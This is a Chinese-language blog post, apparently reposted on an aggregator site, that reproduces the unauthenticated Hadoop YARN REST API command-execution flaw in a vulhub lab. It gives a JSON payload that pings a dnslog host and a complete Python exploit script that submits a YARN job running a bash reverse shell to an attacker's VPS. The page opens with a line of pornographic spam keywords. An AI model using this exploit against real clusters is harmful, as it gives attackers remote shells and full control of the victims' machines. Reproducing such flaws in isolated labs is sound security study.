国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Hadoop 漏洞復(fù)現(xiàn)

這篇具有很好參考價值的文章主要介紹了Hadoop 漏洞復(fù)現(xiàn)。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

一、漏洞描述

Hadoop作為一個分布式計算應(yīng)用程序框架,種類功能繁多,各種組件安全問題會帶來很大的攻擊面。Apache Hadoop YARN是Hadoop的核心組件之一,負(fù)責(zé)將資源分配在Hadoop集群中運行的各種應(yīng)用程序,并調(diào)度要在不同集群節(jié)點上執(zhí)行的任務(wù)。(獨立出的資源管理框架,負(fù)責(zé)資源管理和調(diào)度)

漏洞產(chǎn)生原因

負(fù)責(zé)對資源進(jìn)行同一管理調(diào)度的 ReasourceManager 組件的UI管理界面開放在 8080/8088 端口,攻擊者無需認(rèn)證即可通過REST API 部署任務(wù)來執(zhí)行任意命令,最終可完全控制集群中所有的機(jī)器

二、環(huán)境搭建

cd vulhub/hadoop/unauthorized-yarn

啟動環(huán)境

docker-compose up -d

hadoop漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),安全,web安全
訪問 8088 端口
hadoop漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),安全,web安全

三、漏洞復(fù)現(xiàn)

首先訪問(POST請求) /ws/v1/cluster/apps/new-application 獲取 application-id
hadoop漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),安全,web安全
獲取到 application-id 之后,我們訪問 /ws/v1/cluster/apps 頁面,并且構(gòu)造 Payload

{"application-id": "application_1659336607746_0001", "application-name": "getshell", "am-container-spec": {"commands": {"command": "ping -c 3 test.clw7xm.dnslog.cn"}}, "application-type": "YARN"}

修改 application-id 的值和你要執(zhí)行的命令 command
hadoop漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),安全,web安全
漏洞利用成功
hadoop漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),安全,web安全

四、Exp腳本

# coding:utf-8

import requests

def shell(url,vps_ip,port):
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'
    }
    response = requests.post(url+"/ws/v1/cluster/apps/new-application",headers=headers)
    id = response.json()["application-id"]
    data = {
        'application-id': id,
        'application-name': 'getshell',
        'am-container-spec': {
            'commands': {
                'command': '/bin/bash -i >& /dev/tcp/%s/%s 0>&1'%(vps_ip,port)
            },
        },
        'application-type': 'YARN'}
    exploit = requests.post(url+"/ws/v1/cluster/apps",headers=headers,json=data)
    print("[+] 執(zhí)行完成!")


if __name__ == '__main__':
    url = input("url:")
    vps_ip = input("vps:")
    port = input("port:")
    shell(url,vps_ip,port)

vps 上監(jiān)聽一個端口
hadoop漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),安全,web安全
使用腳本反彈 shell
hadoop漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),安全,web安全
利用成功,成功反彈 Shell
hadoop漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),安全,web安全文章來源地址http://www.zghlxwxcb.cn/news/detail-583028.html

到了這里,關(guān)于Hadoop 漏洞復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進(jìn)行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • 數(shù)據(jù)庫安全:Hadoop 未授權(quán)訪問-命令執(zhí)行漏洞.

    數(shù)據(jù)庫安全:Hadoop 未授權(quán)訪問-命令執(zhí)行漏洞.

    Hadoop 未授權(quán)訪問主要是因為 Hadoop YARN 資源管理系統(tǒng)配置不當(dāng),導(dǎo)致可以未經(jīng)授權(quán)進(jìn)行訪問,從而被攻擊者惡意利用。攻擊者無需認(rèn)證即可通過 RESTAPI 部署任務(wù)來執(zhí)行任意指令,最終完全控制服務(wù)器。 數(shù)據(jù)庫安全:Hadoop 未授權(quán)訪問-命令執(zhí)行漏洞. Hadoop 未授權(quán)訪問-命令執(zhí)行漏

    2024年02月05日
    瀏覽(23)
  • Hadoop Web 控制臺安全認(rèn)證

    Hadoop Web 控制臺安全認(rèn)證

    Hadoop 2.x 版本,默認(rèn)情況下,可以通過 http://ip地址:50070/explorer.html 訪問HDFS頁面,查看Namenode和Datanode狀態(tài),以及HDFS的相關(guān)文件等。但是這存在安全隱患,可能導(dǎo)致我們的文件信息的泄露,如果我們在頁面里面添加個認(rèn)證機(jī)制,只有驗證之后的用戶才可以進(jìn)入頁面里操作。 文件

    2024年02月10日
    瀏覽(20)
  • Hadoop生態(tài)漏洞修復(fù)記錄

    漏洞一: 端口:8088 協(xié)議:TCP 服務(wù):radan-http 漏洞: Apache Hadoop YARN 資源管理器 REST API未授權(quán)訪問漏洞【原理掃描】 官方建議修復(fù)方案: 臨時解決方案: 通過系統(tǒng)內(nèi)置防火墻只允許端口被業(yè)務(wù)主機(jī)訪問 廠商解決方案: 更新Hadoop到2.X以上版本并啟用Kerberos認(rèn)證功能,禁止匿名

    2024年02月13日
    瀏覽(17)
  • web滲透測試漏洞復(fù)現(xiàn):Elasticsearch未授權(quán)漏洞復(fù)現(xiàn)

    Elasticsearch 是一款 Java 編寫的企業(yè)級搜索服務(wù),它以分布式多用戶能力和全文搜索引擎為特點,采用 RESTful web 接口。這款搜索引擎由 Java 開發(fā),作為 Apache 許可下的開源軟件發(fā)布,是流行的企業(yè)級搜索引擎之一。Elasticsearch 的增刪改查操作都通過 http 接口完成。開源的版本可能

    2024年04月10日
    瀏覽(27)
  • 【安全漏洞】ThinkPHP 3.2.3 漏洞復(fù)現(xiàn)

    在 HomeControllerIndexController 下的index中傳入了一個可控參數(shù),跟進(jìn)調(diào)試看一下。 跟進(jìn) display() 一路跟進(jìn)到 fetch() ,然后一路進(jìn)入 Hook::listen(\\\'view_parse\\\', $params); 關(guān)鍵地方在這,我們之前 index 里的內(nèi)容被存入了緩存文件php文件中,連帶著我們輸入的可控的php代碼也在其中,然后包

    2024年02月12日
    瀏覽(22)
  • 【網(wǎng)絡(luò)安全---漏洞復(fù)現(xiàn)】Tomcat CVE-2020-1938 漏洞復(fù)現(xiàn)和利用過程(特詳細(xì))

    【網(wǎng)絡(luò)安全---漏洞復(fù)現(xiàn)】Tomcat CVE-2020-1938 漏洞復(fù)現(xiàn)和利用過程(特詳細(xì))

    分享一個非常詳細(xì)的網(wǎng)絡(luò)安全筆記,是我學(xué)習(xí)網(wǎng)安過程中用心寫的,可以點開以下鏈接獲?。?超詳細(xì)的網(wǎng)絡(luò)安全筆記 Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。該漏洞是由于Tomcat AJP協(xié)議存在缺陷而導(dǎo)致,攻擊者利用該漏洞可通過構(gòu)造特定參數(shù),讀取服務(wù)器webapp下的

    2024年02月08日
    瀏覽(24)
  • 組件安全以及漏洞復(fù)現(xiàn)

    組件安全以及漏洞復(fù)現(xiàn)

    A9:2017-使?含有已知漏洞的組件 A06:2021-Vulnerable and Outdated Components ? 組件(例如:庫、框架和其他軟件模塊)擁有和應(yīng)用程序相同的權(quán)限。如果應(yīng)用程序中含有已知漏洞的組件被攻擊者利用,可能會造成嚴(yán)重的數(shù)據(jù)丟失或服務(wù)器接管。同時,使用含有已知漏洞的組件的應(yīng)用程

    2024年02月09日
    瀏覽(22)
  • 框架安全-CVE 漏洞復(fù)現(xiàn)&Django&Flask&Node.js&JQuery框架漏洞復(fù)現(xiàn)

    框架安全-CVE 漏洞復(fù)現(xiàn)&Django&Flask&Node.js&JQuery框架漏洞復(fù)現(xiàn)

    中間件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,F(xiàn)lask,jQuery 等 1、開發(fā)框架-PHP-Laravel-Thinkphp 2、開發(fā)框架-Javaweb-St2-Spring 3、開發(fā)框架-Python-django-Flask 4、開發(fā)框架-Javascript-Nod

    2024年02月08日
    瀏覽(46)
  • 多個安全廠商安全設(shè)備 遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)

    多個安全廠商安全設(shè)備 遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)

    此文章僅用于技術(shù)交流,嚴(yán)禁用于對外發(fā)起惡意攻擊!??! 該漏洞可執(zhí)行遠(yuǎn)程代碼 FOFA:body=“/webui/images/default/default/alert_close.jpg”

    2024年02月03日
    瀏覽(20)
  • 【W(wǎng)eb】vulhub-httpd apache解析漏洞復(fù)現(xiàn)(1)

    【W(wǎng)eb】vulhub-httpd apache解析漏洞復(fù)現(xiàn)(1)

    目錄 ①CVE-2017-15715 ②apache_parsing_vulnerability 貼出源碼: 意思就是上傳文件的后綴不能是php,php3,php4,php5,phtml,pht 我們看一下.htaccess配置文件 ?這段代碼的作用是告訴 Apache 如何處理以 .php 結(jié)尾的請求,確保這些請求能夠被正確地解釋和執(zhí)行 PHP 代碼,并將結(jié)果返回給客戶端。 這

    2024年02月04日
    瀏覽(16)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包